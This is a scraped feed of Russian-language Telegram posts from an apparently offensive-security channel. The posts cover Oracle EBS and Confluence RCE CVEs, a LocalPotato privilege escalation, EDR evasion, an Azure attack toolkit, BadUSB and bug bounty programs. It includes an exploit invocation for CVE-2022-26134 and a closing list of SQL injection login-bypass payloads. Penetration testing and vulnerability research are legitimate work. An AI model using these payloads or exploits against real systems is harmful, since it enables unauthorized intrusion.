CVE-2022-21587
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
#CVE #POC
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
#CVE #POC
😱2
А PT добавили новые программы на свою багбаунти площадку:
1. ЕСИА - выплаты до 1.000.000 рублей
2. Госуслуги - выплаты до 1.000.000 рублей
https://bugbounty.standoff365.com/programs
1. ЕСИА - выплаты до 1.000.000 рублей
2. Госуслуги - выплаты до 1.000.000 рублей
https://bugbounty.standoff365.com/programs
Standoff365
Программы
Standoff 365 Bug Bounty — платформа для поиска уязвимостей за вознаграждение и самый быстрый способ убедиться в надежности своей IT-инфраструктуры с помощью тысяч сильнейших хакеров.
😱2
Forwarded from Standoff 365
🫡 Легальный шанс взломать Госуслуги
Добавили на платформу две багбаунти программы для тех, кто неравнодушен к государственным сервисам и хочет сделать их безопаснее, ну, или всегда мечтал взломать :)
Госуслуги — сервис с информацией о государственных и муниципальных учреждениях и возможностью воспользоваться их электронными услугами онлайн.
🔸 смотрите полный скоуп на bb.standoff365.com/vendors/digital-gov
ЕСИА — единая система идентификации и аутентификации, государственный провайдер Single sign-on с удостоверением личности пользователя.
🔸💰 до 1 000 000 ₽
Также лучших ждут специально придуманные по такому случаю подарки и инвайты на PHDays 12.
🔮 Сделать безопаснее системы электронного правительства → bb.standoff365.com/vendors/digital-gov
Добавили на платформу две багбаунти программы для тех, кто неравнодушен к государственным сервисам и хочет сделать их безопаснее, ну, или всегда мечтал взломать :)
Госуслуги — сервис с информацией о государственных и муниципальных учреждениях и возможностью воспользоваться их электронными услугами онлайн.
🔸
gosuslugi.ru, freeinternet.gosuslugi.ru, payment.gosuslugi.ru,🔸
esia.gosuslugi.ru, 109.207.2.205, 213.59.254.8
Также лучших ждут специально придуманные по такому случаю подарки и инвайты на PHDays 12.
🔮 Сделать безопаснее системы электронного правительства → bb.standoff365.com/vendors/digital-gov
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Похек
Скрываясь на виду у всех. №1 В этом блоге представлен высокоуровневый обзор трассировки стека, того, как EDR/AV используют ее для обнаружения, использования телеметрии ETWTI и того, что можно сделать, чтобы обойти ее. Итак, прежде чем мы обсудим уклонение…
Скрываясь на виду у всех. №2
Судя по реакции и просмотрам на статье. Она вам понравилась, поэтому выкладываю вторую часть статьи!
Это вторая часть блога о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущем блоге, который доступен по вышеуказанной ссылке.
#RedTeam #Bypass
Судя по реакции и просмотрам на статье. Она вам понравилась, поэтому выкладываю вторую часть статьи!
Это вторая часть блога о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущем блоге, который доступен по вышеуказанной ссылке.
#RedTeam #Bypass
Sergey Zybnev | Pentester
Indirect Syscall is Dead! Bypass all EDRs
Hiding In PlainSight - Indirect Syscall is Dead! Long Live Custom Call Stacks
🔥5
Похек
Скрываясь на виду у всех. №2 Судя по реакции и просмотрам на статье. Она вам понравилась, поэтому выкладываю вторую часть статьи! Это вторая часть блога о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем…
Как вы заметили. Я сделал для своего сайта специальный шаблон Telegram IV (Instant View). Теперь статьи можно читать не покидая телеграм. Но если вы хотите глубже погрузиться в разбор кода в моих статьях, то читайте на сайте. Там есть подсветка синтаксиса для всех ЯПов. Удобнее и приятнее читать будет
LocalPotato CVE-2023-21746 Windows LPE
Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;)
Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать файлы и повышать привилегии.
#CVE #POC
Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;)
Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать файлы и повышать привилегии.
#CVE #POC
❤7
Похек
LocalPotato CVE-2023-21746 Windows LPE Еще одно повышение привилегий локальной Windows с помощью новой техники Potato ;) Атака LocalPotato - это тип атаки отражения NTLM, направленной на локальную аутентификацию. Эта атака позволяет произвольно читать/записывать…
Разбор уязвимости LocalPotato CVE-2023-21746 на русском языке!
LocalPotato CVE-2023-21746 Windows LPE
После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное чтение/запись файлов. Сочетание возможности произвольной записи в файл с выполнением кода позволило нам добиться повышения привилегий по всей цепочке от пользователя до SYSTEM.
В этой статье есть разбор эксплойта и то, как он был пропатчен. Данная статья представляет большой интерес для Red&Blue Team!
LocalPotato CVE-2023-21746 Windows LPE
После обширного исследования мы пришли к "LocalPotato", не очень распространенной атаке отражения NTLM в локальной аутентификации, позволяющей произвольное чтение/запись файлов. Сочетание возможности произвольной записи в файл с выполнением кода позволило нам добиться повышения привилегий по всей цепочке от пользователя до SYSTEM.
В этой статье есть разбор эксплойта и то, как он был пропатчен. Данная статья представляет большой интерес для Red&Blue Team!
Sergey Zybnev | Pentester
LocalPotato Windows LPE CVE-2023-21746
The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation
❤3
MicroBurst: A PowerShell Toolkit for Attacking Azure
MicroBurst включает функции и сценарии, поддерживающие обнаружение служб Azure, проверка на misconfiguration и post exploitation, такие как сброс учетных данных. Инструмент предназначен для использования во время тестов на проникновение, где используется Azure.
Импорт модуля:
Используйте следующую команду "Unblock-File" для рекурсивной проверки:
A Beginners Guide to Gathering Azure Passwords
Anonymously Enumerating Azure Services
Anonymously Enumerating Azure File Resources
Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
Using Azure Automation Accounts to Access Key Vaults
Get-AzPasswords: Encrypting Automation Password Data
Azure Privilege Escalation Using Managed Identities
MicroBurst включает функции и сценарии, поддерживающие обнаружение служб Azure, проверка на misconfiguration и post exploitation, такие как сброс учетных данных. Инструмент предназначен для использования во время тестов на проникновение, где используется Azure.
Импорт модуля:
Import-Module .\MicroBurst.psm1Это позволит импортировать все применимые функции на основе установленных в настоящее время модулей в вашем окружении.
Используйте следующую команду "Unblock-File" для рекурсивной проверки:
dir -Recurse .\MicroBurst-master | Unblock-File
Дополнительный материал по пентесту Azure:A Beginners Guide to Gathering Azure Passwords
Anonymously Enumerating Azure Services
Anonymously Enumerating Azure File Resources
Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
Using Azure Automation Accounts to Access Key Vaults
Get-AzPasswords: Encrypting Automation Password Data
Azure Privilege Escalation Using Managed Identities
🔥4👍1
Xakep - Очень плохая флешка.pdf
1.5 MB
Xakep - Очень плохая флешка. Разбираем атаку BadUSB в деталях
Об атаках BadUSB «Хакер» уже неоднократно писал. Сегодня мы разберем конкретный пример реализации такой атаки, подробно опишем устройство вредоносной флешки, приведем записанный на нее код и обсудим, как заставить пользователя Windows или Linux подключить ее к своему компьютеру.
#Xakep
Об атаках BadUSB «Хакер» уже неоднократно писал. Сегодня мы разберем конкретный пример реализации такой атаки, подробно опишем устройство вредоносной флешки, приведем записанный на нее код и обсудим, как заставить пользователя Windows или Linux подключить ее к своему компьютеру.
#Xakep
🔥7
CVE-2022-26134 Confluence Pre-Auth RCE via OGNL Injection
Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.
Использование:
#CVE #POC
Confluence - это корпоративная вики на основе веб-технологий, разработанная австралийской компанией Atlassian. 02 июня 2022 года компания Atlassian выпустила совет по безопасности для своих приложений Confluence Server и Data Center, в котором говорится об уязвимости критической важности, связанной с неавторизованным удаленным выполнением кода. Уязвимость инъекции OGNL позволяет не аутентифицированному пользователю выполнить произвольный код на Confluence Server или Data Center.
Использование:
git clone https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE.git
python3 confluence-exploit.py -u https://confluence.app
Rooted!#CVE #POC
👍5
Похек
Photo
OSINT 14 февраля
44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
44.688485,-63.6641767
41.303921,-81.901693
43.978734,15.384636
-20.937542, 164.658825
🌚4👍3
🧠 Awesome ChatGPT Prompts
Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.
В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.
Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!
#ChatGPT
Добро пожаловать в репозиторий "Awesome ChatGPT Prompts"! Это коллекция примеров запросов для ChatGPT.
В этом репозитории вы найдете множество подсказок, которые можно использовать в ChatGPT. Мы призываем вас добавлять свои собственные подсказки в этот список, а также использовать ChatGPT для генерации новых команд. Для начала, просто клонируйте этот репозиторий и используйте подсказки из файла README.md в качестве исходных данных для ChatGPT. Вы также можете использовать запросы в этом файле как вдохновение для создания своих собственных.
Мы надеемся, что эти запросы окажутся полезными, и вам будет интересно использовать ChatGPT!
#ChatGPT
🔥4
CrackerJack
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
Веб интерфейс написанный на Python для Hashcat
Цель этого проекта - сохранить независимость графического интерфейса и Hashcat.
В двух словах, вот как это работает:
1. Пользователь загружает хэши, выбирает wordlist/правила/маску и т.д. и нажимает "Start".
2. Веб-сервер открывает новый screen.
3. Генерирует команду hashcat на основе настроек.
4. Запускает команду внутри screen.
5. Следит выводом screen, разбирает его и отображает в графическом интерфейсе.
Это позволяет CrackerJack быть перспективным, поскольку он упрощает работу с Hashcat.
#tools
❤4
SQL injection auth bypass list
or 1=1#sqli
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
🐳6👍1💯1